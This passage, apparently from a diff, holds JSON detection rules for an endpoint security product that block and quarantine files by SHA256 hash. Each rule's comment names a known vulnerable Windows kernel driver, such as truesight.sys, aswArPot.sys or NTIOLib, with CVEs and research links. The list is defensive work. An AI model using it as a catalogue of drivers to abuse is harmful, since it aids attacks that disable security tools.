"creation_date": "2026-03-23T11:45:30.835791Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b04d79bf5f1038113278d0f22f0d4a262e1416b52e8983e25dd1a6c226a99e2c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28706d2e-50b2-51b9-94ea-5def0c1f6a8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144753Z", + "creation_date": "2026-03-23T11:45:31.144755Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144761Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "254c19c95c44c54d4bd33df6898245b44699a2121db520e621e9c140a358e8bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2870aa4c-f10d-5a6e-9c10-645b843daf4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815986Z", + "creation_date": "2026-03-23T11:45:31.815990Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815998Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b047cd7bb68be8ddec660503d5b6f30f99b0091420a987cb6ff172b3fa6e4fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2872703e-bc36-5ae0-8de2-78407291bb9b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486447Z", + "creation_date": "2026-03-23T11:45:31.486450Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486458Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea15838c7281eb1afb472e7ea8801b8f32232a661153754aa69dafd98f534953", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2884afd6-ebca-5d79-aee7-2932a94663d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822203Z", + "creation_date": "2026-03-23T11:45:31.822205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822210Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "82c86dccb438ae2f58d44fe34c5780fb02334ff0329868a28f55b85b18b1f47b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2886cab4-72f8-540c-bbe0-3c49982c9234", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970245Z", + "creation_date": "2026-03-23T11:45:29.970247Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970252Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "00716eab8a3277128fb5ea8b1ac863e4b81b40674f7c6eb0f201e96341fd87c9", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "289001a0-3ef1-55c0-880f-42c3c1d99321", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472378Z", + "creation_date": "2026-03-23T11:45:31.472381Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472390Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c2b90cc27a96098b59ae89939e6adc00a8fdd69a9b43a23730e50571fe68abb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28963a63-7d3c-5bc5-9a23-5530a85da16a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156962Z", + "creation_date": "2026-03-23T11:45:31.156964Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156970Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4de9d73720d02d54e0db5bd5bcaded5425bb73ef0886cfa8b74e48df921ee49", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28a4b087-8491-517a-bd65-fcf74da2190e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146077Z", + "creation_date": "2026-03-23T11:45:31.146079Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146084Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37e3631303ef170f071203b4577a998e7390e3bcacf23d9dc5fee7252353dbee", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28a87c3f-d4af-53b9-81eb-73750a75640f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153890Z", + "creation_date": "2026-03-23T11:45:31.153892Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153897Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "163c5afcc5ef9d4561cb0ee04b85d0b8d2026423079c797484221a442194e687", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28b03214-b2b3-5594-8709-4dc806d2e668", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, 
+ "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968167Z", + "creation_date": "2026-03-23T11:45:29.968169Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968175Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28cadc33-4e01-5cc4-9b99-02bd8b3517f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156178Z", + "creation_date": "2026-03-23T11:45:31.156180Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156186Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8bf703ff0947ef595d5bbb1a7a424a52384c5b0e84e3fe0214409fdddb978464", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] 
[file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28d1d35d-5151-5d28-b28f-48422d5f2365", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807641Z", + "creation_date": "2026-03-23T11:45:31.807643Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807649Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a44dd4e5c71952ee7939fcc946de0e9ccf9e63688145dbb42a0257bd4fb6a440", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28dbf36c-5288-5f4d-b31a-267784752981", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618638Z", + "creation_date": "2026-03-23T11:45:29.618639Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618645Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9434a50e1a6252f23af362631a5576017cce3ef109d7fc93748de8bd46f9385", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28f47e18-09f5-5def-8cd9-8269b4ea3304", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461441Z", + "creation_date": "2026-03-23T11:45:30.461445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461453Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8926e31be2d1355e542793af8ff9ccc4d1d60cae40c9564b2400dd4e1090bda", + "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28f8596c-8777-5e2b-a3c6-d892c40ae168", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824744Z", + "creation_date": "2026-03-23T11:45:31.824746Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824752Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72a3e975efe38c77ad08dfd6157441a20fb019cabc9690a8ea581ce853b3e849", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28fa2cac-d391-5fc8-9def-0d80a8681181", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827415Z", + "creation_date": "2026-03-23T11:45:30.827418Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.827424Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "55161795c5c581bdc27485517bab35b0833a77352863a78ae4f964f29eeb49ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "291fd1b8-1cae-5f23-a4a6-69e6332436bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984769Z", + "creation_date": "2026-03-23T11:45:29.984771Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984776Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8d748834fb982fa033cd2671843de727999b21fad30979ac4acc4828910ef8b", + "comment": "Dangerous Physmem Kernel Driver (aka AsrIbDrv.Sys) [https://www.loldrivers.io/drivers/31797996-6973-402d-a4a0-d01ce51e02c0/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "293bb433-d95d-5be9-bdd2-f9a5cceef068", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830332Z", + "creation_date": "2026-03-23T11:45:30.830334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4c44e3bb181ff2a7eb2bc636f8329bdc23978c99d83187da0b0c1eeb938fd07", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2953ef13-5600-51a7-aed2-e4c9b852afb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486719Z", + "creation_date": "2026-03-23T11:45:31.486722Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486731Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "d6464deb7e8579caa7fa5c082208afa742ac599b48b51339b55315f3e8ebf22b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2956366e-56a8-562b-a0a5-678ab3cd30b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816594Z", + "creation_date": "2026-03-23T11:45:30.816597Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816606Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c23ac21bfcf3bd7f76d4f3b91844ab35427a1a2d3bbaf93f7916edf7569e4b22", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "29691329-9ff2-51de-9ceb-2380494b9375", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498779Z", + "creation_date": "2026-03-23T11:45:31.498782Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498791Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7dbc0fa7f12095caae00bca5e1d9e51f226290cb993aad2f39fbc8db670a2a7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "296bc7b7-fab7-519f-b93b-70a424453b25", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614649Z", + "creation_date": "2026-03-23T11:45:29.614650Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614656Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79e2d37632c417138970b4feba91b7e10c2ea251c5efe3d1fc6fa0190f176b57", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and 
NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "296e8761-5546-5b82-a8a2-52deea4971fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494942Z", + "creation_date": "2026-03-23T11:45:31.494944Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494957Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0bd3d995db6fbb4593d2ade20e4003b2e27ffad6a45f0a564bd9cf4ad7a8bafd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2974722a-2640-5131-8342-0e94a05cf11d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154536Z", + "creation_date": 
